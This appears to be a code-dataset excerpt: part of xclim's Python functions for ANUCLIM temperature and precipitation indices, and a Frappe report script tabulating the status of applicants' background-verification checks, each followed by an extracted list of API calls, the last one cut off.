-> xarray.DataArray: r"""ANUCLIM Mean temperature of wettest/driest quarter. The wettest (or driest) quarter of the year is determined, and the mean temperature of this period is calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods, otherwise are 3 months. Parameters ---------- tas : xarray.DataArray Mean temperature at daily, weekly, or monthly frequency. pr : xarray.DataArray Total precipitation rate at daily, weekly, or monthly frequency. op : {'wettest', 'driest'} Operation to perform: 'wettest' calculate for the wettest quarter; 'driest' calculate for the driest quarter. src_timestep : {'D', 'W', 'M'} Input data time frequency - One of daily, weekly or monthly. freq : str Resampling frequency. Returns ------- xarray.DataArray, [same as tas] Mean temperature values of the {op} quarter of each year. Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. """ tas_qrt = _to_quarter(src_timestep, tas=tas) pr_qrt = _to_quarter(src_timestep, pr=pr) xr_op = _xr_argops[op] with xarray.set_options(keep_attrs=True): out = _from_other_arg(criteria=pr_qrt, output=tas_qrt, op=xr_op, freq=freq) out.attrs = tas.attrs return out @declare_units(pr="[precipitation]") def prcptot_wetdry_quarter( pr: xarray.DataArray, op: str = None, src_timestep: str = None, freq: str = "YS" ) -> xarray.DataArray: r"""ANUCLIM Total precipitation of wettest/driest quarter. The wettest (or driest) quarter of the year is determined, and the total precipitation of this period is calculated. If the input data frequency is daily ("D") or weekly ("W") quarters are defined as 13 week periods, otherwise are 3 months. Parameters ---------- pr : xarray.DataArray Total precipitation rate at daily, weekly, or monthly frequency. op : {'wettest', 'driest'} Operation to perform : 'wettest' calculate wettest quarter ; 'driest' calculate driest quarter. src_timestep : {'D', 'W', 'M'} Input data time frequency - One of daily, weekly or monthly. freq : str Resampling frequency. Returns ------- xarray.DataArray, [length] Total precipitation values of the {op} quarter of each year. 
Examples -------- The following would compute for each grid cell of file `pr.day.nc` the annual wettest quarter total precipitation: >>> from xclim.indices import prcptot_wetdry_quarter >>> p = xr.open_dataset(path_to_pr_file) >>> pr_warm_qrt = prcptot_wetdry_quarter(pr=p.pr, op='wettest', src_timestep='D') Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. """ # returns mm values pr_qrt = _to_quarter(src_timestep, pr=pr) try: oper = _np_ops[op] except KeyError: raise NotImplementedError( f'Unknown operation "{op}" ; not one of "wettest" or "driest"' ) out = select_resample_op(pr_qrt, oper, freq) out.attrs["units"] = pr_qrt.units return out @declare_units(pr="[precipitation]", tas="[temperature]") def prcptot_warmcold_quarter( pr: xarray.DataArray, tas: xarray.DataArray, op: str = None, src_timestep: str = None, freq: str = "YS", ) -> xarray.DataArray: r"""ANUCLIM Total precipitation of warmest/coldest quarter. The warmest (or coldest) quarter of the year is determined, and the total precipitation of this period is calculated. If the input data frequency is daily ("D) or weekly ("W"), quarters are defined as 13 week periods, otherwise are 3 months. Parameters ---------- pr : xarray.DataArray Total precipitation rate at daily, weekly, or monthly frequency. tas : xarray.DataArray Mean temperature at daily, weekly, or monthly frequency. op : {'warmest', 'coldest'} Operation to perform: 'warmest' calculate for the warmest quarter ; 'coldest' calculate for the coldest quarter. src_timestep : {'D', 'W', 'M'} Input data time frequency - One of daily, weekly or monthly. freq : str Resampling frequency. Returns ------- xarray.DataArray : [mm] Total precipitation values of the {op} quarter of each year Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. """ # determine input data frequency tas_qrt = _to_quarter(src_timestep, tas=tas) # returns mm values pr_qrt = _to_quarter(src_timestep, pr=pr) xr_op = _xr_argops[op] out = _from_other_arg(criteria=tas_qrt, output=pr_qrt, op=xr_op, freq=freq) out.attrs = pr_qrt.attrs return out @declare_units(pr="[precipitation]") def prcptot( pr: xarray.DataArray, src_timestep: str = None, freq: str = "YS" ) -> xarray.DataArray: r"""ANUCLIM Accumulated total precipitation. Parameters ---------- pr : xarray.DataArray Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar. src_timestep : {'D', 'W', 'M'} Input data time frequency - One of daily, weekly or monthly. freq : str Resampling frequency. Returns ------- xarray.DataArray, [length] Total precipitation. Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. 
""" pram = rate2amount(pr) return pram.resample(time=freq).sum(dim="time", keep_attrs=True) # FIXME: src_timestep is not used here. @declare_units(pr="[precipitation]") def prcptot_wetdry_period( pr: xarray.DataArray, *, op: str, src_timestep: str, freq: str = "YS" ) -> xarray.DataArray: r"""ANUCLIM precipitation of the wettest/driest day, week, or month, depending on the time step. Parameters ---------- pr : xarray.DataArray Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar. op : {'wettest', 'driest'} Operation to perform : 'wettest' calculate wettest period ; 'driest' calculate driest period. src_timestep : {'D', 'W', 'M'} Input data time frequency - One of daily, weekly or monthly. freq : str Resampling frequency. Returns ------- xarray.DataArray, [length] Total precipitation of the {op} period. Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. """ pram = rate2amount(pr) if op == "wettest": return pram.resample(time=freq).max(dim="time", keep_attrs=True) if op == "driest": return pram.resample(time=freq).min(dim="time", keep_attrs=True) raise NotImplementedError( f'Unknown operation "{op}" ; op parameter but be one of "wettest" or "driest"' ) def _anuclim_coeff_var(arr: xarray.DataArray) -> xarray.DataArray: """Calculate the annual coefficient of variation for ANUCLIM indices.""" std = arr.resample(time="YS").std(dim="time") mu = arr.resample(time="YS").mean(dim="time") return std / mu def _from_other_arg( criteria: xarray.DataArray, output: xarray.DataArray, op, freq: str ) -> xarray.DataArray: """Pick values from output based on operation returning an index from criteria. Parameters ---------- criteria : DataArray Series on which operation returning index is applied. output : DataArray Series to be indexed. op : func Function returning an index, for example np.argmin, np.argmax, np.nanargmin, np.nanargmax. freq : str Temporal grouping. Returns ------- DataArray Output values where criteria is met at the given frequency. """ ds = xarray.Dataset(data_vars={"criteria": criteria, "output": output}) dim = "time" def get_other_op(dataset): all_nans = dataset.criteria.isnull().all(dim=dim) index = op(dataset.criteria.where(~all_nans, 0), dim=dim) return lazy_indexing(dataset.output, index=index, dim=dim).where(~all_nans) return ds.resample(time=freq).map(get_other_op) def _to_quarter( freq: str, pr: Optional[xarray.DataArray] = None, tas: Optional[xarray.DataArray] = None, ) -> xarray.DataArray: """Convert daily, weekly or monthly time series to quarterly time series according to ANUCLIM specifications.""" if freq.upper().startswith("D"): if tas is not None: tas = tg_mean(tas, freq="7D") if pr is not None: # Accumulate on a week # Ensure units are back to a "rate" for rate2amount below pr = convert_units_to(precip_accumulation(pr, freq="7D"), "mm") pr.attrs["units"] = "mm/week" freq = "W" if freq.upper().startswith("W"): window = 13 elif freq.upper().startswith("M"): window = 3 else: raise NotImplementedError( f'Unknown input time frequency "{freq}": must be one of "D", "W" or "M".' 
) if tas is not None: tas = ensure_chunk_size(tas, time=np.ceil(window / 2)) if pr is not None: pr = ensure_chunk_size(pr, time=np.ceil(window / 2)) if pr is not None: pram = rate2amount(pr) out = pram.rolling(time=window, center=False).sum() out.attrs = pr.attrs out.attrs["units"] = pram.units if tas is not None: out = tas.rolling(time=window, center=False).mean(skipna=False) out.attrs = tas.attrs out = ensure_chunk_size(out, time=-1) return out
[((1421, 1482), 'xclim.core.units.declare_units', 'declare_units', ([], {'tasmin': '"""[temperature]"""', 'tasmax': '"""[temperature]"""'}), "(tasmin='[temperature]', tasmax='[temperature]')\n", (1434, 1482), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((2760, 2794), 'xclim.core.units.declare_units', 'declare_units', ([], {'tas': '"""[temperature]"""'}), "(tas='[temperature]')\n", (2773, 2794), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((4548, 4583), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (4561, 4583), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6563, 6597), 'xclim.core.units.declare_units', 'declare_units', ([], {'tas': '"""[temperature]"""'}), "(tas='[temperature]')\n", (6576, 6597), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((8529, 8585), 'xclim.core.units.declare_units', 'declare_units', ([], {'tas': '"""[temperature]"""', 'pr': '"""[precipitation]"""'}), "(tas='[temperature]', pr='[precipitation]')\n", (8542, 8585), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((10436, 10471), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (10449, 10471), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((12570, 12626), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""', 'tas': '"""[temperature]"""'}), "(pr='[precipitation]', tas='[temperature]')\n", (12583, 12626), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((14495, 14530), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (14508, 14530), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((15506, 15541), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (15519, 15541), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((4379, 4405), 'xclim.core.units.convert_units_to', 'convert_units_to', (['tas', '"""K"""'], {}), "(tas, 'K')\n", (4395, 4405), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((15378, 15393), 'xclim.core.units.rate2amount', 'rate2amount', (['pr'], {}), '(pr)\n', (15389, 15393), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((16719, 16734), 'xclim.core.units.rate2amount', 'rate2amount', (['pr'], {}), '(pr)\n', (16730, 16734), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((17961, 18027), 'xarray.Dataset', 'xarray.Dataset', ([], {'data_vars': "{'criteria': criteria, 'output': output}"}), "(data_vars={'criteria': criteria, 'output': output})\n", (17975, 18027), False, 'import xarray\n'), ((19730, 19761), 
'xclim.core.utils.ensure_chunk_size', 'ensure_chunk_size', (['out'], {'time': '(-1)'}), '(out, time=-1)\n', (19747, 19761), False, 'from xclim.core.utils import ensure_chunk_size\n'), ((2642, 2677), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (2660, 2677), False, 'import xarray\n'), ((4416, 4451), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (4434, 4451), False, 'import xarray\n'), ((6343, 6357), 'xclim.core.units.units2pint', 'units2pint', (['pr'], {}), '(pr)\n', (6353, 6357), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6361, 6376), 'xclim.core.units.units', 'units', (['"""mm / s"""'], {}), "('mm / s')\n", (6366, 6376), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6391, 6421), 'xclim.core.units.convert_units_to', 'convert_units_to', (['pr', '"""mm d-1"""'], {}), "(pr, 'mm d-1')\n", (6407, 6421), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6432, 6467), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (6450, 6467), False, 'import xarray\n'), ((10263, 10298), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (10281, 10298), False, 'import xarray\n'), ((19447, 19462), 'xclim.core.units.rate2amount', 'rate2amount', (['pr'], {}), '(pr)\n', (19458, 19462), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((19303, 19322), 'numpy.ceil', 'np.ceil', (['(window / 2)'], {}), '(window / 2)\n', (19310, 19322), True, 'import numpy as np\n'), ((19387, 19406), 'numpy.ceil', 'np.ceil', (['(window / 2)'], {}), '(window / 2)\n', (19394, 19406), True, 'import numpy as np\n')]
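A minimal illustrative sketch, not part of the record above: it reproduces the yearly coefficient-of-variation step that _anuclim_coeff_var and temperature_seasonality perform, on a made-up three-year daily temperature series (the sine-wave values, the dates, and the 280 K baseline are assumptions for illustration only).

import numpy as np
import pandas as pd
import xarray as xr

# Synthetic daily mean temperature in Kelvin over three years (illustrative values only).
time = pd.date_range("2000-01-01", "2002-12-31", freq="D")
tas = xr.DataArray(
    280 + 10 * np.sin(2 * np.pi * time.dayofyear / 365.25),
    coords={"time": time},
    dims="time",
    attrs={"units": "K"},
)

# Same quantity temperature_seasonality returns: per-year standard deviation
# expressed as a percentage of the per-year mean.
std = tas.resample(time="YS").std(dim="time")
mu = tas.resample(time="YS").mean(dim="time")
seasonality_pct = 100 * std / mu
print(seasonality_pct.values)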
vhrspvl/vhrs-bvs
bvs/background_verification/report/checks_status_report/checks_status_report.py
56667039d9cc09ad0b092e5e6c5dd6598ff41e7b
# Copyright (c) 2013, VHRS and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe from frappe import _, msgprint from frappe.utils import (cint, cstr, date_diff, flt, getdate, money_in_words, nowdate, rounded, today) from datetime import datetime from datetime import date import datetime from calendar import monthrange def execute(filters=None): columns = get_columns() data = [] row = [] filters applicant = applicants(filters) for app in applicant: row = [app.customer, app.ref_id, app.candidate_name, app.in_date, app.status, app.checks_group] if app.status != "Entry Pending": cg = frappe.get_doc("Checks Group", app.checks_group) if cg.employment_check1 == 1: emp = frappe.get_doc("Employment Check1", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Employment Check1", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.employment_check2 == 1: emp = frappe.get_doc("Employment Check2", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Employment Check2", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.employment_check3 == 1: emp = frappe.get_doc("Employment Check3", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Employment Check3", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.employment_check4 == 1: emp = frappe.get_doc("Employment Check4", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Employment Check4", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.education_check1 == 1: if frappe.db.exists("Education Check1", { "applicant_id": app.ref_id}): emp = frappe.get_doc("Education Check1", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Education Check1", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.education_check2 == 1: emp = frappe.get_doc("Education Check2", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Education Check2", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.education_check3 == 1: emp = frappe.get_doc("Education Check3", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Education Check3", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.education_check4 == 1: emp = frappe.get_doc("Education Check4", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Education Check4", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.address_check1 == 1: emp = frappe.get_doc("Address Check1", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Address Check1", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.address_check2 == 1: emp = frappe.get_doc("Address Check2", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = 
frappe.get_doc("Verify Address Check2", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.address_check3 == 1: emp = frappe.get_doc("Address Check3", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Address Check3", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.address_check4 == 1: emp = frappe.get_doc("Address Check4", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Address Check4", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.family_check1 == 1: emp = frappe.get_doc("Family Check1", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Family Check1", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.reference_check1 == 1: emp = frappe.get_doc("Reference Check1", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Reference Check1", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.reference_check2 == 1: emp = frappe.get_doc("Reference Check2", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Reference Check2", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.reference_check3 == 1: emp = frappe.get_doc("Reference Check3", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Reference Check3", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.reference_check4 == 1: emp = frappe.get_doc("Reference Check4", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Reference Check4", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.civil_check == 1: emp = frappe.get_doc("Civil Check", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Civil Check", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.criminal_check == 1: emp = frappe.get_doc("Criminal Check", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify Criminal Check", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.id_check1 == 1: emp = frappe.get_doc("ID Check1", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify ID Check1", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.id_check2 == 1: emp = frappe.get_doc("ID Check2", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify ID Check2", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.id_check3 == 1: emp = frappe.get_doc("ID Check3", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify ID Check3", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.id_check4 == 1: emp = frappe.get_doc("ID Check4", { "applicant_id": app.ref_id}) if 
emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify ID Check4", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.id_check5 == 1: emp = frappe.get_doc("ID Check5", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify ID Check5", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] if cg.id_check6 == 1: emp = frappe.get_doc("ID Check6", { "applicant_id": app.ref_id}) if emp.status != "Allocation Completed": row += [emp.status] else: vemp = frappe.get_doc("Verify ID Check6", { "applicant_id": app.ref_id}) row += [vemp.status] else: row += ["-"] data.append(row) return columns, data def get_columns(): columns = [ _("Project Name") + ":Link/Customer:200", _("VHRS Ref. No") + ":Data:150", _("Candidate Name") + ":Data:180", _("Start Date") + ":Date:150", _("Status") + ":Data:150", _("Checks Group Name") + ":Data:150", _("Emp Check1 Status") + ":Data:150", _("Emp Check2 Status") + ":Data:150", _("Emp Check3 Status") + ":Data:150", _("Emp Check4 Status") + ":Data:150", _("Edu Check1 Status") + ":Data:150", _("Edu Check2 Status") + ":Data:150", _("Edu Check3 Status") + ":Data:150", _("Edu Check4 Status") + ":Data:150", _("Add Check1 Status") + ":Data:150", _("Add Check2 Status") + ":Data:150", _("Add Check3 Status") + ":Data:150", _("Add Check4 Status") + ":Data:150", _("Family Check Status") + ":Data:150", _("Ref Check1 Status") + ":Data:150", _("Ref Check2 Status") + ":Data:150", _("Ref Check3 Status") + ":Data:150", _("Ref Check4 Status") + ":Data:150", _("Civil Check1 Status") + ":Data:150", _("Criminal Check2 Status") + ":Data:150", _("ID Check1 Status") + ":Data:150", _("ID Check2 Status") + ":Data:150", _("ID Check3 Status") + ":Data:150", _("ID Check4 Status") + ":Data:150", _("ID Check5 Status") + ":Data:150", _("ID Check6 Status") + ":Data:150", ] return columns def applicants(filters): applicant = frappe.db.sql( """select app.checks_group,app.customer,app.ref_id,app.candidate_name,app.in_date,app.status from `tabApplicant` app where app.in_date between %(start_date)s and %(end_date)s order by app.in_date""", { "start_date": filters.get("from_date"), "end_date": filters.get("to_date") }, as_dict=1) return applicant
[((751, 799), 'frappe.get_doc', 'frappe.get_doc', (['"""Checks Group"""', 'app.checks_group'], {}), "('Checks Group', app.checks_group)\n", (765, 799), False, 'import frappe\n'), ((12871, 12888), 'frappe._', '_', (['"""Project Name"""'], {}), "('Project Name')\n", (12872, 12888), False, 'from frappe import _, msgprint\n'), ((12921, 12938), 'frappe._', '_', (['"""VHRS Ref. No"""'], {}), "('VHRS Ref. No')\n", (12922, 12938), False, 'from frappe import _, msgprint\n'), ((12962, 12981), 'frappe._', '_', (['"""Candidate Name"""'], {}), "('Candidate Name')\n", (12963, 12981), False, 'from frappe import _, msgprint\n'), ((13005, 13020), 'frappe._', '_', (['"""Start Date"""'], {}), "('Start Date')\n", (13006, 13020), False, 'from frappe import _, msgprint\n'), ((13044, 13055), 'frappe._', '_', (['"""Status"""'], {}), "('Status')\n", (13045, 13055), False, 'from frappe import _, msgprint\n'), ((13079, 13101), 'frappe._', '_', (['"""Checks Group Name"""'], {}), "('Checks Group Name')\n", (13080, 13101), False, 'from frappe import _, msgprint\n'), ((13125, 13147), 'frappe._', '_', (['"""Emp Check1 Status"""'], {}), "('Emp Check1 Status')\n", (13126, 13147), False, 'from frappe import _, msgprint\n'), ((13171, 13193), 'frappe._', '_', (['"""Emp Check2 Status"""'], {}), "('Emp Check2 Status')\n", (13172, 13193), False, 'from frappe import _, msgprint\n'), ((13217, 13239), 'frappe._', '_', (['"""Emp Check3 Status"""'], {}), "('Emp Check3 Status')\n", (13218, 13239), False, 'from frappe import _, msgprint\n'), ((13263, 13285), 'frappe._', '_', (['"""Emp Check4 Status"""'], {}), "('Emp Check4 Status')\n", (13264, 13285), False, 'from frappe import _, msgprint\n'), ((13309, 13331), 'frappe._', '_', (['"""Edu Check1 Status"""'], {}), "('Edu Check1 Status')\n", (13310, 13331), False, 'from frappe import _, msgprint\n'), ((13355, 13377), 'frappe._', '_', (['"""Edu Check2 Status"""'], {}), "('Edu Check2 Status')\n", (13356, 13377), False, 'from frappe import _, msgprint\n'), ((13401, 13423), 'frappe._', '_', (['"""Edu Check3 Status"""'], {}), "('Edu Check3 Status')\n", (13402, 13423), False, 'from frappe import _, msgprint\n'), ((13447, 13469), 'frappe._', '_', (['"""Edu Check4 Status"""'], {}), "('Edu Check4 Status')\n", (13448, 13469), False, 'from frappe import _, msgprint\n'), ((13493, 13515), 'frappe._', '_', (['"""Add Check1 Status"""'], {}), "('Add Check1 Status')\n", (13494, 13515), False, 'from frappe import _, msgprint\n'), ((13539, 13561), 'frappe._', '_', (['"""Add Check2 Status"""'], {}), "('Add Check2 Status')\n", (13540, 13561), False, 'from frappe import _, msgprint\n'), ((13585, 13607), 'frappe._', '_', (['"""Add Check3 Status"""'], {}), "('Add Check3 Status')\n", (13586, 13607), False, 'from frappe import _, msgprint\n'), ((13631, 13653), 'frappe._', '_', (['"""Add Check4 Status"""'], {}), "('Add Check4 Status')\n", (13632, 13653), False, 'from frappe import _, msgprint\n'), ((13677, 13701), 'frappe._', '_', (['"""Family Check Status"""'], {}), "('Family Check Status')\n", (13678, 13701), False, 'from frappe import _, msgprint\n'), ((13725, 13747), 'frappe._', '_', (['"""Ref Check1 Status"""'], {}), "('Ref Check1 Status')\n", (13726, 13747), False, 'from frappe import _, msgprint\n'), ((13771, 13793), 'frappe._', '_', (['"""Ref Check2 Status"""'], {}), "('Ref Check2 Status')\n", (13772, 13793), False, 'from frappe import _, msgprint\n'), ((13817, 13839), 'frappe._', '_', (['"""Ref Check3 Status"""'], {}), "('Ref Check3 Status')\n", (13818, 13839), False, 'from frappe import _, msgprint\n'), 
((13863, 13885), 'frappe._', '_', (['"""Ref Check4 Status"""'], {}), "('Ref Check4 Status')\n", (13864, 13885), False, 'from frappe import _, msgprint\n'), ((13909, 13933), 'frappe._', '_', (['"""Civil Check1 Status"""'], {}), "('Civil Check1 Status')\n", (13910, 13933), False, 'from frappe import _, msgprint\n'), ((13957, 13984), 'frappe._', '_', (['"""Criminal Check2 Status"""'], {}), "('Criminal Check2 Status')\n", (13958, 13984), False, 'from frappe import _, msgprint\n'), ((14008, 14029), 'frappe._', '_', (['"""ID Check1 Status"""'], {}), "('ID Check1 Status')\n", (14009, 14029), False, 'from frappe import _, msgprint\n'), ((14053, 14074), 'frappe._', '_', (['"""ID Check2 Status"""'], {}), "('ID Check2 Status')\n", (14054, 14074), False, 'from frappe import _, msgprint\n'), ((14098, 14119), 'frappe._', '_', (['"""ID Check3 Status"""'], {}), "('ID Check3 Status')\n", (14099, 14119), False, 'from frappe import _, msgprint\n'), ((14143, 14164), 'frappe._', '_', (['"""ID Check4 Status"""'], {}), "('ID Check4 Status')\n", (14144, 14164), False, 'from frappe import _, msgprint\n'), ((14188, 14209), 'frappe._', '_', (['"""ID Check5 Status"""'], {}), "('ID Check5 Status')\n", (14189, 14209), False, 'from frappe import _, msgprint\n'), ((14233, 14254), 'frappe._', '_', (['"""ID Check6 Status"""'], {}), "('ID Check6 Status')\n", (14234, 14254), False, 'from frappe import _, msgprint\n'), ((864, 929), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check1', {'applicant_id': app.ref_id})\n", (878, 929), False, 'import frappe\n'), ((1347, 1412), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check2', {'applicant_id': app.ref_id})\n", (1361, 1412), False, 'import frappe\n'), ((1830, 1895), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check3', {'applicant_id': app.ref_id})\n", (1844, 1895), False, 'import frappe\n'), ((2313, 2378), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check4', {'applicant_id': app.ref_id})\n", (2327, 2378), False, 'import frappe\n'), ((2792, 2858), 'frappe.db.exists', 'frappe.db.exists', (['"""Education Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check1', {'applicant_id': app.ref_id})\n", (2808, 2858), False, 'import frappe\n'), ((3419, 3483), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check2', {'applicant_id': app.ref_id})\n", (3433, 3483), False, 'import frappe\n'), ((3899, 3963), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check3', {'applicant_id': app.ref_id})\n", (3913, 3963), False, 'import frappe\n'), ((4379, 4443), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check4', {'applicant_id': app.ref_id})\n", (4393, 4443), False, 'import frappe\n'), ((4857, 4919), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check1', {'applicant_id': app.ref_id})\n", (4871, 4919), False, 'import frappe\n'), ((5331, 5393), 'frappe.get_doc', 'frappe.get_doc', (['"""Address 